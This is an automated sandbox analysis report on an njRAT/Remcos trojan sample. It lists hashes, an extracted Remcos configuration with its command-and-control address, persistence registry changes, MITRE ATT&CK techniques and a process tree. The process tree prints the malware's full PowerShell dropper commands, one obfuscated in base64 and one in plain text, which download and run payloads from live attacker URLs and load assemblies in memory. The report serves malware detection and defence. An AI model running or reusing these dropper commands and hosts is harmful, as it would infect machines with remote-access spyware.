njrat | 86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880f

Analysis

max time kernel
120s
max time network
121s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
21-09-2024 11:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe
Size

1.3MB
MD5

b65ebd99cc7c2d3edb769ca10b161860
SHA1

794add2168ddeb0bf878de65a4d36c601c8d08b1
SHA256

86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880f
SHA512

417d39638c0d3c98cb017a95bf2bcb3d48a81ca212728f51bd1784393153c5dd4f26b9c6edecd24cf50b72ab909329018145c6555c79cc8872c383da90c00421
SSDEEP

24576:wDqqL6uZ5XCPss2b21xX2/h9LKkhayrblnWem/tm9GWgY3MhYuKnBpdOh1EUdRGi:w+q5WX1xIpThayr5h9GWgY3MhlKnBpYp

Score

10^/10

njrat remcos localhost discovery execution persistence rat trojan

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://asboywnrihlvdsbpigftigzyb20gyw5vbnltb3vz.ru/cmfwe2

exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Family

remcos

Botnet

localhost

46.8.221.61:443

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-M7U8MB
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
Remcos
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Blocklisted process makes network request 2 IoCs

flow	pid	Process
15	640	powershell.exe
17	3720	powershell.exe

.NET Reactor proctector 1 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral2/memory/3720-87-0x00000000060D0000-0x00000000060E8000-memory.dmp	net_reactor

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer.js	86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer.js	86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExplorerJs = "C:\\Windows\\System32\\WScript.exe \"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Explorer.js\""	86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2264	powershell.exe
640	powershell.exe
2924	powershell.exe
3720	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3720 set thread context of 4632	3720	powershell.exe	97
PID 3720 set thread context of 3592	3720	powershell.exe	98

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2880	3552	WerFault.exe	81

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_regbrowsers.exe

Modifies registry class 3 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "JSFile"	86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\JSFile\ = "JScript Script File"	86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\JSFile\Shell\Open\Command\ = "C:\\Windows\\SysWow64\\WScript.exe \"%1\" %*"	86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
2264	powershell.exe
2264	powershell.exe
640	powershell.exe
640	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3552	86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe
Token: SeDebugPrivilege	2264	powershell.exe
Token: SeDebugPrivilege	640	powershell.exe
Token: SeDebugPrivilege	2924	powershell.exe
Token: SeDebugPrivilege	3720	powershell.exe
Token: SeDebugPrivilege	3592	aspnet_regbrowsers.exe
Token: 33	3592	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	3592	aspnet_regbrowsers.exe
Token: 33	3592	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	3592	aspnet_regbrowsers.exe
Token: 33	3592	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	3592	aspnet_regbrowsers.exe
Token: 33	3592	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	3592	aspnet_regbrowsers.exe
Token: 33	3592	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	3592	aspnet_regbrowsers.exe
Token: 33	3592	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	3592	aspnet_regbrowsers.exe
Token: 33	3592	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	3592	aspnet_regbrowsers.exe
Token: 33	3592	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	3592	aspnet_regbrowsers.exe
Token: 33	3592	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	3592	aspnet_regbrowsers.exe
Token: 33	3592	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	3592	aspnet_regbrowsers.exe
Token: 33	3592	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	3592	aspnet_regbrowsers.exe
Token: 33	3592	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	3592	aspnet_regbrowsers.exe
Token: 33	3592	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	3592	aspnet_regbrowsers.exe
Token: 33	3592	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	3592	aspnet_regbrowsers.exe
Token: 33	3592	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	3592	aspnet_regbrowsers.exe
Token: 33	3592	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	3592	aspnet_regbrowsers.exe
Token: 33	3592	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	3592	aspnet_regbrowsers.exe
Token: 33	3592	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	3592	aspnet_regbrowsers.exe
Token: 33	3592	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	3592	aspnet_regbrowsers.exe
Token: 33	3592	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	3592	aspnet_regbrowsers.exe
Token: 33	3592	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	3592	aspnet_regbrowsers.exe
Token: 33	3592	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	3592	aspnet_regbrowsers.exe
Token: 33	3592	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	3592	aspnet_regbrowsers.exe
Token: 33	3592	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	3592	aspnet_regbrowsers.exe
Token: 33	3592	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	3592	aspnet_regbrowsers.exe
Token: 33	3592	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	3592	aspnet_regbrowsers.exe
Token: 33	3592	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	3592	aspnet_regbrowsers.exe
Token: 33	3592	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	3592	aspnet_regbrowsers.exe
Token: 33	3592	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	3592	aspnet_regbrowsers.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4632	aspnet_regbrowsers.exe

Suspicious use of WriteProcessMemory 38 IoCs

description	pid	Process	procid_target
PID 3552 wrote to memory of 3300	3552	86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe	82
PID 3552 wrote to memory of 3300	3552	86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe	82
PID 3552 wrote to memory of 3300	3552	86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe	82
PID 3300 wrote to memory of 2264	3300	WScript.exe	83
PID 3300 wrote to memory of 2264	3300	WScript.exe	83
PID 3300 wrote to memory of 2264	3300	WScript.exe	83
PID 2264 wrote to memory of 640	2264	powershell.exe	85
PID 2264 wrote to memory of 640	2264	powershell.exe	85
PID 2264 wrote to memory of 640	2264	powershell.exe	85
PID 640 wrote to memory of 2924	640	powershell.exe	93
PID 640 wrote to memory of 2924	640	powershell.exe	93
PID 640 wrote to memory of 2924	640	powershell.exe	93
PID 2924 wrote to memory of 3720	2924	powershell.exe	95
PID 2924 wrote to memory of 3720	2924	powershell.exe	95
PID 2924 wrote to memory of 3720	2924	powershell.exe	95
PID 3720 wrote to memory of 4608	3720	powershell.exe	96
PID 3720 wrote to memory of 4608	3720	powershell.exe	96
PID 3720 wrote to memory of 4608	3720	powershell.exe	96
PID 3720 wrote to memory of 4632	3720	powershell.exe	97
PID 3720 wrote to memory of 4632	3720	powershell.exe	97
PID 3720 wrote to memory of 4632	3720	powershell.exe	97
PID 3720 wrote to memory of 4632	3720	powershell.exe	97
PID 3720 wrote to memory of 4632	3720	powershell.exe	97
PID 3720 wrote to memory of 4632	3720	powershell.exe	97
PID 3720 wrote to memory of 4632	3720	powershell.exe	97
PID 3720 wrote to memory of 4632	3720	powershell.exe	97
PID 3720 wrote to memory of 4632	3720	powershell.exe	97
PID 3720 wrote to memory of 4632	3720	powershell.exe	97
PID 3720 wrote to memory of 4632	3720	powershell.exe	97
PID 3720 wrote to memory of 4632	3720	powershell.exe	97
PID 3720 wrote to memory of 3592	3720	powershell.exe	98
PID 3720 wrote to memory of 3592	3720	powershell.exe	98
PID 3720 wrote to memory of 3592	3720	powershell.exe	98
PID 3720 wrote to memory of 3592	3720	powershell.exe	98
PID 3720 wrote to memory of 3592	3720	powershell.exe	98
PID 3720 wrote to memory of 3592	3720	powershell.exe	98
PID 3720 wrote to memory of 3592	3720	powershell.exe	98
PID 3720 wrote to memory of 3592	3720	powershell.exe	98

C:\Users\Admin\AppData\Local\Temp\86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe
"C:\Users\Admin\AppData\Local\Temp\86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe"
1⤵
- Drops startup file
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3552
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer.js"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3300
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $fLbjh = 'JA㍿lAEgASg㍿jAGsAIAA9ACAAJA㍿oAG8Acw㍿0AC4AVg㍿lAHIAcw㍿pAG8AbgAuAE0AYQ㍿qAG8AcgAuAEUAcQ㍿1AGEAbA㍿zACgAMgApADsACg㍿JAGYAIAAoACAAJA㍿lAEgASg㍿jAGsAIAApACAAewAKACAAIAAgACAAJA㍿NAGoATA㍿qAHAAIAA9ACAAWw㍿TAHkAcw㍿0AGUAbQAuAEkATwAuAFAAYQ㍿0AGgAXQA6ADoARw㍿lAHQAVA㍿lAG0AcA㍿QAGEAdA㍿oACgAKQA7AAoAIAAgACAAIA㍿kAGUAbAAgACgAJA㍿NAGoATA㍿qAHAAIAArACAAJw㍿cAFUAcA㍿3AGkAbgAuAG0Acw㍿1ACcAKQA7AAoAIAAgACAAIAAkAHMAaQ㍿WAHAAUAAgAD0AIAAnAGgAdA㍿0AHAAcwA6AC8ALw㍿kAHIAaQ㍿2AGUALg㍿nAG8Abw㍿nAGwAZQAuAGMAbw㍿tAC8AdQ㍿jAD8AZQ㍿4AHAAbw㍿yAHQAPQ㍿kAG8Adw㍿uAGwAbw㍿hAGQAJg㍿pAGQAPQAnADsACgAgACAAIAAgACQAUQ㍿EAGYARw㍿vACAAPQAgACQAZQ㍿uAHYAOg㍿QAFIATw㍿DAEUAUw㍿TAE8AUg㍿fAEEAUg㍿DAEgASQ㍿UAEUAQw㍿UAFUAUg㍿FAC4AQw㍿vAG4AdA㍿hAGkAbg㍿zACgAJwA2ADQAJwApADsACgAgACAAIAAgAGkAZgAgACgAIAAkAFEARA㍿mAEcAbwAgACkAIA㍿7AAoAIAAgACAAIAAgACAAIAAgACQAcw㍿pAFYAcA㍿QACAAPQAgACgAJA㍿zAGkAVg㍿wAFAAIAArACAAJwAxAGIAcg㍿qADUAag㍿xAG4AcQ㍿SAHgAQw㍿EADYAVg㍿oAGYAaA㍿㍿AG4AMg㍿yAGMAVg㍿mAHMAUg㍿vADcARAA4AGcAcgAnACkAOwAKACAAIAAgACAAfQAgAGUAbA㍿zAGUAIA㍿7AAoAIAAgACAAIAAgACAAIAAgACQAcw㍿pAFYAcA㍿QACAAPQAgACgAJA㍿zAGkAVg㍿wAFAAIAArACAAJwAxAGIAcg㍿qADUAag㍿xAG4AcQ㍿SAHgAQw㍿EADYAVg㍿oAGYAaA㍿㍿AG4AMg㍿yAGMAVg㍿mAHMAUg㍿vADcARAA4AGcAcgAnACkAOwAKACAAIAAgACAAfQA7AAoAIAAgACAAIAAkAE4AeQ㍿CAFkAYwAgAD0AIAAoACAATg㍿lAHcALQ㍿PAGIAag㍿lAGMAdAAgAE4AZQ㍿0AC4AVw㍿lAGIAQw㍿sAGkAZQ㍿uAHQAIAApADsACgAgACAAIAAgACQATg㍿5AEIAWQ㍿jAC4ARQ㍿uAGMAbw㍿kAGkAbg㍿nACAAPQAgAFsAUw㍿5AHMAdA㍿lAG0ALg㍿UAGUAeA㍿0AC4ARQ㍿uAGMAbw㍿kAGkAbg㍿nAF0AOgA6AFUAVA㍿GADgAOwAKACAAIAAgACAAJA㍿OAHkAQg㍿ZAGMALg㍿EAG8Adw㍿uAGwAbw㍿hAGQARg㍿pAGwAZQAoACQAVQ㍿SAEwASw㍿CACwAIAAkAE0Aag㍿MAGoAcAAgACsAIAAnAFwAVQ㍿wAHcAaQ㍿uAC4AbQ㍿zAHUAJwApADsACgAgACAAIAAgACQAQQ㍿VAHIARw㍿GACAAPQAgACgAIAAnAEMAOg㍿cAFUAcw㍿lAHIAcw㍿cACcAIAArACAAWw㍿FAG4Adg㍿pAHIAbw㍿uAG0AZQ㍿uAHQAXQA6ADoAVQ㍿zAGUAcg㍿OAGEAbQ㍿lACAAKQA7AAoAIAAgACAAIAAkAEkAeg㍿qAEEAUQAgAD0AIAAoACAAJA㍿NAGoATA㍿qAHAAIAArACAAJw㍿cAFUAcA㍿3AGkAbgAuAG0Acw㍿1ACcAIAApADsACgAgACAAIAAgAHAAbw㍿3AGUAcg㍿zAGgAZQ㍿sAGwALg㍿lAHgAZQAgAHcAdQ㍿zAGEALg㍿lAHgAZQAgACQASQ㍿6AGoAQQ㍿RACAALw㍿xAHUAaQ㍿lAHQAIAAvAG4Abw㍿yAGUAcw㍿0AGEAcg㍿0ADsACgAgACAAIAAgAEMAbw㍿wAHkALQ㍿JAHQAZQ㍿tACAAJwAlAEQAQw㍿QAEoAVQAlACcAIAAtAEQAZQ㍿zAHQAaQ㍿uAGEAdA㍿pAG8AbgAgACgAIAAkAEEAVQ㍿yAEcARgAgACsAIAAnAFwAQQ㍿wAHAARA㍿hAHQAYQ㍿cAFIAbw㍿hAG0AaQ㍿uAGcAXA㍿NAGkAYw㍿yAG8Acw㍿vAGYAdA㍿cAFcAaQ㍿uAGQAbw㍿3AHMAXA㍿TAHQAYQ㍿yAHQAIA㍿NAGUAbg㍿1AFwAUA㍿yAG8AZw㍿yAGEAbQ㍿zAFwAUw㍿0AGEAcg㍿0AHUAcAAnACAAKQAgAC0AZg㍿vAHIAYw㍿lADsACgAgACAAIAAgAHAAbw㍿3AGUAcg㍿zAGgAZQ㍿sAGwALg㍿lAHgAZQAgAC0AYw㍿vAG0AbQ㍿hAG4AZAAgACcAcw㍿sAGUAZQ㍿wACAAMQA4ADAAJwA7AAoAIAAgACAAIA㍿zAGgAdQ㍿0AGQAbw㍿3AG4ALg㍿lAHgAZQAgAC8AcgAgAC8AdAAgADAAIAAvAGYAOwAKAH0AIA㍿lAGwAcw㍿lACAAewAKACAAIAAgACAAWw㍿TAHkAcw㍿0AGUAbQAuAE4AZQ㍿0AC4AUw㍿lAHIAdg㍿pAGMAZQ㍿QAG8AaQ㍿uAHQATQ㍿hAG4AYQ㍿nAGUAcg㍿dADoAOg㍿TAGUAcg㍿2AGUAcg㍿DAGUAcg㍿0AGkAZg㍿pAGMAYQ㍿0AGUAVg㍿hAGwAaQ㍿kAGEAdA㍿pAG8Abg㍿DAGEAbA㍿sAGIAYQ㍿jAGsAIAA9ACAAewAgACQAdA㍿yAHUAZQAgAH0ACgAgACAAIAAgAFsAUw㍿5AHMAdA㍿lAG0ALg㍿OAGUAdAAuAFMAZQ㍿yAHYAaQ㍿jAGUAUA㍿vAGkAbg㍿0AE0AYQ㍿uAGEAZw㍿lAHIAXQA6ADoAUw㍿lAGMAdQ㍿yAGkAdA㍿5AFAAcg㍿vAHQAbw㍿jAG8AbAAgAD0AIA㍿bAFMAeQ㍿zAHQAZQ㍿tAC4ATg㍿lAHQALg㍿TAGUAYw㍿1AHIAaQ㍿0AHkAUA㍿yAG8AdA㍿vAGMAbw㍿sAFQAeQ㍿wAGUAXQA6ADoAVA㍿sAHMAMQAyAAoAIAAgACAAIAAkAGYAZw㍿IAFkASwAgAD0AIA㍿OAGUAdwAtAE8AYg㍿qAGUAYw㍿0ACAATg㍿lAHQALg㍿XAGUAYg㍿DAGwAaQ㍿lAG4AdAAKACAAIAAgACAAJA㍿mAGcASA㍿ZAEsALg㍿FAG4AYw㍿vAGQAaQ㍿uAGcAIAA9ACAAWw㍿TAHkAcw㍿0AGUAbQAuAFQAZQ㍿4AHQALg㍿FAG4AYw㍿vAGQAaQ㍿uAGcAXQA6ADoAVQ㍿UAEYAOAAKACAAIAAgACAAJA㍿4AE0AQQ㍿tAEoAIAA9ACAAJA㍿mAGcASA㍿ZAEsALg㍿EAG8Adw㍿uAGwAbw㍿hAGQAUw㍿0AHIAaQ㍿uAGcAKAAnAGgAdA㍿0AHAAOgAvAC8AYQ㍿zAGIAbw㍿5AHcAbg㍿yAGkAaA㍿sAHYAZA㍿zAGIAcA㍿pAGcAZg㍿0AGkAZw㍿6AHkAYgAyADAAZw㍿5AHcANQ㍿2AGIAbg㍿sAHQAYgAzAHYAegAuAHIAdQAvAGMAbQ㍿mAHcAZQAyACcAKQAKACAAIAAgACAAJA㍿mAGcASA㍿ZAEsALg㍿EAGkAcw㍿wAG8Acw㍿lACgAKQAKACAAIAAgACAAJA㍿mAGcASA㍿ZAEsAIAA9ACAATg㍿lAHcALQ㍿PAGIAag㍿lAGMAdAAgAE4AZQ㍿0AC4AVw㍿lAGIAQw㍿sAGkAZQ㍿uAHQACgAgACAAIAAgACQAZg㍿nAEgAWQ㍿LAC4ARQ㍿uAGMAbw㍿kAGkAbg㍿nACAAPQAgAFsAUw㍿5AHMAdA㍿lAG0ALg㍿UAGUAeA㍿0AC4ARQ㍿uAGMAbw㍿kAGkAbg㍿nAF0AOgA6AFUAVA㍿GADgACgAgACAAIAAgACQAeA㍿NAEEAbQ㍿KACAAPQAgACQAZg㍿nAEgAWQ㍿LAC4ARA㍿vAHcAbg㍿sAG8AYQ㍿kAFMAdA㍿yAGkAbg㍿nACgAJA㍿4AE0AQQ㍿tAEoAKQAKACAAIAAgACAAWw㍿CAHkAdA㍿lAFsAXQ㍿dACAAJA㍿SAFgAaQ㍿WAGoAXw㍿ZAGwAdA㍿IAEsAIAA9ACAAWw㍿TAHkAcw㍿0AGUAbQAuAEMAbw㍿uAHYAZQ㍿yAHQAXQA6ADoARg㍿yAG8AbQ㍿CAGEAcw㍿lADYANA㍿TAHQAcg㍿pAG4AZwAoACQAeA㍿NAEEAbQ㍿KAC4AUg㍿lAHAAbA㍿hAGMAZQAoACcAkyE6AJMhJwAsACAAJw㍿㍿ACcAKQApAAoAIAAgACAAIA㍿bAFMAeQ㍿zAHQAZQ㍿tAC4AQQ㍿wAHAARA㍿vAG0AYQ㍿pAG4AXQA6ADoAQw㍿1AHIAcg㍿lAG4AdA㍿EAG8AbQ㍿hAGkAbgAuAEwAbw㍿hAGQAKAAkAFIAWA㍿pAFYAag㍿fAFkAbA㍿0AEgASwApAC4ARw㍿lAHQAVA㍿5AHAAZQAoACcAQw㍿sAGEAcw㍿zAEwAaQ㍿iAHIAYQ㍿yAHkAMwAuAEMAbA㍿hAHMAcwAxACcAKQAuAEcAZQ㍿0AE0AZQ㍿0AGgAbw㍿kACgAJw㍿wAHIARg㍿WAEkAJwApAC4ASQ㍿uAHYAbw㍿rAGUAKAAkAG4AdQ㍿sAGwALAAgAFsAbw㍿iAGoAZQ㍿jAHQAWw㍿dAF0AKAAnAHIAZQ㍿yAG8AbA㍿wAHgARQAvAGwAcg㍿1AC8AdQ㍿yAC4Aeg㍿2ADMAYg㍿0AGwAbg㍿iAHYANQ㍿3AHkAZwAwADIAYg㍿5AHoAZw㍿pAHQAZg㍿nAGkAcA㍿iAHMAZA㍿2AGwAaA㍿pAHIAbg㍿3AHkAbw㍿iAHMAYQAvAC8AOg㍿wAHQAdA㍿oACcALAAgACcAJQ㍿EAEMAUA㍿KAFUAJQAnACwAIAAnAHQAcg㍿1AGUAJwApACkACg㍿9ADsA';$fLbjh = $fLbjh.replace('㍿','B') ;$fLbjh = [System.Convert]::FromBase64String( $fLbjh ) ;;;$fLbjh = [System.Text.Encoding]::Unicode.GetString( $fLbjh ) ;$fLbjh = $fLbjh.replace('%DCPJU%','C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer.js') ;powershell $fLbjh
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2264
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$eHJck = $host.Version.Major.Equals(2); If ( $eHJck ) { $MjLjp = [System.IO.Path]::GetTempPath(); del ($MjLjp + '\Upwin.msu'); $siVpP = 'https://drive.google.com/uc?export=download&id='; $QDfGo = $env:PROCESSOR_ARCHITECTURE.Contains('64'); if ( $QDfGo ) { $siVpP = ($siVpP + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr'); } else { $siVpP = ($siVpP + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr'); }; $NyBYc = ( New-Object Net.WebClient ); $NyBYc.Encoding = [System.Text.Encoding]::UTF8; $NyBYc.DownloadFile($URLKB, $MjLjp + '\Upwin.msu'); $AUrGF = ( 'C:\Users\' + [Environment]::UserName ); $IzjAQ = ( $MjLjp + '\Upwin.msu' ); powershell.exe wusa.exe $IzjAQ /quiet /norestart; Copy-Item 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer.js' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force; powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f; } else { [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 $fgHYK = New-Object Net.WebClient $fgHYK.Encoding = [System.Text.Encoding]::UTF8 $xMAmJ = $fgHYK.DownloadString('http://asboywnrihlvdsbpigftigzyb20gyw5vbnltb3vz.ru/cmfwe2') $fgHYK.Dispose() $fgHYK = New-Object Net.WebClient $fgHYK.Encoding = [System.Text.Encoding]::UTF8 $xMAmJ = $fgHYK.DownloadString($xMAmJ) [Byte[]] $RXiVj_YltHK = [System.Convert]::FromBase64String($xMAmJ.Replace('↓:↓', 'A')) [System.AppDomain]::CurrentDomain.Load($RXiVj_YltHK).GetType('ClassLibrary3.Class1').GetMethod('prFVI').Invoke($null, [object[]]('rerolpxE/lru/ur.zv3btlnbv5wyg02byzgitfgipbsdvlhirnwyobsa//:ptth', 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer.js', 'true')) };"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:640
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\x.ps1
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2924
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\x.ps1
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3720
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
        7⤵
        
        PID:4608
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
        7⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4632
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3592
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 1656
  2⤵
  - Program crash
  PID:2880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3552 -ip 3552
1⤵
PID:3348

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

